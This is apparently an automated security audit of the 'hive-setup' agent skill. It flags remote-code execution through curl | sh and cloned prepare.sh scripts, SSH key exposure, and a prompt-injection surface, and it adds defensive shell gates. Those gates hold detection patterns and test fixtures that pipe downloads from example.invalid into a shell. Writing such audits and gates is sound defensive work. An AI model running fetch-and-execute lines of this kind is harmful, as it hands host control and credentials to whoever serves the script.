hive-setup
Skill: skills/rllm-org/hive/hive-setup

Audit result: Fail

Audited by Gen Agent Trust Hub on Apr 7, 2026

Risk Level: HIGH
Tags: COMMAND_EXECUTION, EXTERNAL_DOWNLOADS, REMOTE_CODE_EXECUTION, DATA_EXFILTRATION, PROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: Runs sudo apt-get to install system-wide Python packages on Linux. This needs administrative privileges, so while the skill executes the agent has root-level control of the host, not just its own user account.
  • [REMOTE_CODE_EXECUTION]: Installs uv by piping the installer fetched from https://astral.sh/uv/install.sh straight into a shell (curl | sh). The script is executed unread, with no pinning or checksum, so the agent runs whatever the server or CDN happens to serve at that moment.
  • [REMOTE_CODE_EXECUTION]: After cloning a task from the remote hive server, runs `bash prepare.sh` from the cloned directory. The task author therefore has arbitrary code execution in the agent's user context.
  • [COMMAND_EXECUTION]: Installs Python dependencies from any requirements.txt found in the cloned task directory, using pip or uv, without reviewing or pinning them. A requirements file can name arbitrary packages, alternative indexes or direct URLs, and source distributions run code at build time, so this is a second path to executing task-author code.
  • [DATA_EXFILTRATION]: Reads and manages SSH private keys stored in ~/.hive/keys/, which the skill uses to authenticate to Git repositories while cloning tasks. Because prepare.sh and the dependency install run as the same user, a malicious task could read these keys and send them off-host.
  • [PROMPT_INJECTION]: Indirect prompt-injection surface: the skill ingests untrusted content from the remote task server and then executes scripts and installs packages taken from that content.
      • Ingestion points: hive task clone command (SKILL.md)
      • Boundary markers: Absent
      • Capability inventory: bash prepare.sh, uv pip install, and hive auth commands (SKILL.md)
      • Sanitization: No sanitization or verification of the cloned content is performed before execution.
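The prepare.sh and requirements.txt findings above share one root cause: cloned task content is executed without any inspection. The following is an added example, not code from the hive skill or the rllm-org project, of a minimal pre-execution gate that an operator could run on a cloned task directory before `bash prepare.sh` or `uv pip install -r requirements.txt`. The pattern lists are illustrative and the fixture files it checks are constructed for the demonstration; nothing here is real hive task content.

```sh
#!/usr/bin/env sh
# Added example (not part of the hive skill): vet a cloned task directory
# before its prepare.sh is run or its requirements.txt is installed.
# Each check prints its findings and returns 1 if anything risky was seen.

# Flag requirements.txt entries that are not pinned with == or that pull
# from arbitrary locations (pip option lines, URLs, VCS refs, direct refs).
check_requirements() {
  req="$1"
  rc=0
  [ -f "$req" ] || return 0
  while IFS= read -r line || [ -n "$line" ]; do
    # drop comments and surrounding whitespace
    spec=$(printf '%s' "$line" | sed 's/#.*$//; s/^[[:space:]]*//; s/[[:space:]]*$//')
    [ -z "$spec" ] && continue
    case "$spec" in
      -*) echo "requirements: option line redirects pip: $spec"; rc=1 ;;
      *://*|*git+*|*@*) echo "requirements: direct URL/VCS source: $spec"; rc=1 ;;
      *==*) ;;   # exact pin: acceptable
      *) echo "requirements: unpinned dependency: $spec"; rc=1 ;;
    esac
  done < "$req"
  return $rc
}

# Flag shell constructs in prepare.sh that fetch-and-execute remote code,
# escalate privileges, or hide what they run. Illustrative, not exhaustive.
check_prepare() {
  script="$1"
  rc=0
  [ -f "$script" ] || return 0
  if grep -nE '(curl|wget)[^|]*[|][[:space:]]*(sudo[[:space:]]+)?(ba|z|da)?sh' "$script"; then
    echo "prepare.sh: pipes downloaded content into a shell"; rc=1
  fi
  if grep -nE '(^|[;&|[:space:]])sudo[[:space:]]' "$script"; then
    echo "prepare.sh: uses sudo"; rc=1
  fi
  if grep -nE '(^|[^[:alnum:]_])eval([^[:alnum:]_]|$)|base64[[:space:]]+(-d|--decode)' "$script"; then
    echo "prepare.sh: eval or base64 decode (possible obfuscation)"; rc=1
  fi
  return $rc
}

# Gate: returns 0 only if both files pass.
vet_task_dir() {
  dir="$1"
  status=0
  check_requirements "$dir/requirements.txt" || status=1
  check_prepare "$dir/prepare.sh" || status=1
  return $status
}

# Constructed fixtures for the demonstration (not real hive task content).
make_fixture() {
  dir="$1"; kind="$2"
  mkdir -p "$dir"
  if [ "$kind" = bad ]; then
    printf '%s\n' 'requests>=2.0' \
      '--extra-index-url https://pypi.example.invalid/simple' \
      'helper @ git+https://example.invalid/helper.git' \
      'numpy==1.26.4' > "$dir/requirements.txt"
    printf '%s\n' '#!/bin/bash' \
      'curl -fsSL https://example.invalid/setup.sh | sh' \
      'sudo apt-get install -y python3-pip' > "$dir/prepare.sh"
  else
    printf '%s\n' 'requests==2.32.3' 'numpy==1.26.4' > "$dir/requirements.txt"
    printf '%s\n' '#!/bin/bash' 'python3 -m venv .venv' > "$dir/prepare.sh"
  fi
}

# Stand-alone demonstration on the constructed fixtures.
demo_root=$(mktemp -d)
make_fixture "$demo_root/bad" bad
make_fixture "$demo_root/good" good
for t in bad good; do
  if vet_task_dir "$demo_root/$t"; then echo "$t: OK to run"; else echo "$t: BLOCKED"; fi
done
rm -rf "$demo_root"
```

A gate like this does not make cloned content safe; it only refuses the obvious cases and forces a human to look at the rest. The stronger control is running prepare.sh and the dependency install in a throwaway sandbox that cannot see ~/.hive/keys/ at all.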
Recommendations
  • HIGH: Downloads and executes remote code from https://astral.sh/uv/install.sh. DO NOT USE without thorough review. At minimum, fetch the installer to a file, read it, and record its digest, then execute only a file that matches that digest instead of piping the download into a shell.
  • Automated analysis detected serious security threats.
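The HIGH recommendation above is actionable without changing what gets installed. The following is an added example, not code from the hive skill or from Astral, of the fetch-to-file, verify-digest, then execute flow. The pinned digest is assumed to be a value the operator records after reviewing the script once; the installer file used below is a constructed stand-in so the check runs offline, and the network fetch of the real script is shown only in a comment.

```sh
#!/usr/bin/env sh
# Added example (not part of the hive skill): replace `curl ... | sh` with
# download, verify against a pinned SHA-256, then execute. A changed or
# tampered installer fails closed instead of running.

# Portable SHA-256 of a file (coreutils sha256sum or BSD shasum).
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | cut -d' ' -f1
  else
    shasum -a 256 "$1" | cut -d' ' -f1
  fi
}

# Run an installer only if it matches the pinned digest.
# $1 = path to the downloaded script, $2 = expected sha256 (lowercase hex).
# Returns 0 if verified and executed, 1 on mismatch (script is not run).
run_verified_installer() {
  script="$1"; expected="$2"
  actual=$(sha256_of "$script")
  if [ "$actual" != "$expected" ]; then
    echo "refusing to run $script: sha256 $actual != pinned $expected" >&2
    return 1
  fi
  sh "$script"
}

# Real flow (needs network; not exercised in this offline demonstration):
#   curl -fsSL -o /tmp/uv-install.sh https://astral.sh/uv/install.sh
#   run_verified_installer /tmp/uv-install.sh "$UV_INSTALLER_SHA256"
# UV_INSTALLER_SHA256 is assumed to be an operator-recorded digest taken
# when the script was reviewed; it is not a value published by this page.

# Constructed stand-in installer so the check can run without network.
make_fake_installer() {
  printf '%s\n' '#!/bin/sh' 'echo "stand-in installer ran"' > "$1"
}

# Stand-alone demonstration: first run matches the pin, second does not.
demo_script=$(mktemp)
make_fake_installer "$demo_script"
pinned=$(sha256_of "$demo_script")
run_verified_installer "$demo_script" "$pinned" && echo "verified: executed"
# Simulate a silently updated or tampered installer.
echo 'curl -fsSL https://example.invalid/extra | sh' >> "$demo_script"
run_verified_installer "$demo_script" "$pinned" || echo "changed: blocked"
rm -f "$demo_script"
```

Pinning means an upstream change, legitimate or not, stops the install until someone re-reads the script and updates the digest; that is the intended trade-off. Where a release artifact with a published checksum is available, installing from that artifact is preferable to pinning an installer script at all.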
Audit Metadata
Risk Level: HIGH
Analyzed: Apr 7, 2026, 04:46 AM